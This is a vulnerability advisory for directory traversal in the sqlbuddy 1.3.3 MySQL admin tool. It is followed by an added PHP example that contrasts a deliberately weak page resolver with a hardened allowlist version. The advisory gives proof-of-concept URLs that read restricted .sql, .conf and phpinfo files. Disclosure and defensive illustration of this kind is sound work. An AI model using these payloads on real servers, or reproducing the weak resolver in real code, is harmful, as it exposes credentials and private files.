Read arbitrary server files due to path and file extension subversion

Affected Vendor: www.sqlbuddy.com
Credits: John Page (hyp3rlinx)
Domains: hyp3rlinx.altervista.org
Source: http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt
Product: sqlbuddy version 1.3.3

SQL Buddy is an open source web based MySQL administration application.

Advisory Information:
==============================
sqlbuddy suffers from directory traversal whereby a user can move about directories and read any PHP and non-PHP files by appending the '#' hash character when requesting files via URLs, e.g. .doc, .txt, .xml, .conf, .sql etc.

After adding the '#' character as a delimiter, any non-PHP file will be returned and rendered, subverting the .php concatenation used by sqlbuddy when requesting PHP pages via the POST method.

Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=

POC exploits:
=======================
1-Read from Apache restricted directory under htdocs:
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#

2-Read any arbitrary files that do not have .PHP extensions:
http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#

3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo

Disclosure Timeline:
==================================
Vendor Notification: N/A
May 9, 2015: Public Disclosure - hyp3rlinx

Exploitation Technique:
=======================
Create a test file with a non-.php extension in some htdocs directory, then request the page in the browser:
http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt#

Severity Level:
===============
High

Description:
==========================
Request Method(s):
[+] POST

Vulnerable Product:
[+] sqlbuddy 1.3.3

Vulnerable Parameter(s):
[+] #page=[somefile]

Affected Area(s):
[+] Server directories & sensitive files

===============================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

(hyp3rlinx)
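The file-resolution flaw described under Advisory Information, shown beside a hardened resolver, as an added example that is not sqlbuddy's own code (the advisory does not quote its source). The weak function models the class of pattern the advisory describes, a request-supplied page name joined to '.php'; the allowlist map, page names and paths are assumptions for illustration.

```php
<?php
// Added example, not sqlbuddy's code: models a request-supplied page name
// being turned into a file path, and a resolver that never builds the path
// from user input, so '../' traversal and trailing delimiters such as '#'
// have nothing to act on.
declare(strict_types=1);

// Assumed weak pattern: the '.php' suffix is the only restriction, so any
// input that walks up with '../' or defeats the suffix picks the file.
function resolve_page_weak(string $page): string
{
    return __DIR__ . '/' . $page . '.php';
}

// Hardened resolver: the request value is only a key into a fixed map
// (hypothetical page names); no filesystem path is derived from the input.
const PAGES = [
    'home'   => 'home.php',
    'query'  => 'query.php',
    'export' => 'export.php',
];

function resolve_page_safe(string $page, array $pages = PAGES): ?string
{
    // Reject anything that is not a short plain identifier before lookup;
    // this refuses '#', '/', '.', '..' and NUL bytes outright.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $page)) {
        return null;
    }
    if (!array_key_exists($page, $pages)) {
        return null;
    }
    // Defence in depth: the mapped file must exist and resolve under the
    // application root; a missing file is rejected rather than guessed at.
    $base = realpath(__DIR__);
    $path = realpath(__DIR__ . '/' . $pages[$page]);
    if ($path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs modelled on the advisory's PoC values.
foreach (['home', '../../../test.txt#', '../../../../xampp/phpinfo'] as $p) {
    printf("%-28s weak=%s\n%-28s safe=%s\n", $p, resolve_page_weak($p),
        '', resolve_page_safe($p) ?? 'rejected');
}
```

The weak resolver happily returns a path outside its directory for the traversal inputs, while the safe one rejects them at the identifier check; 'home' resolves only when home.php actually exists beside the script.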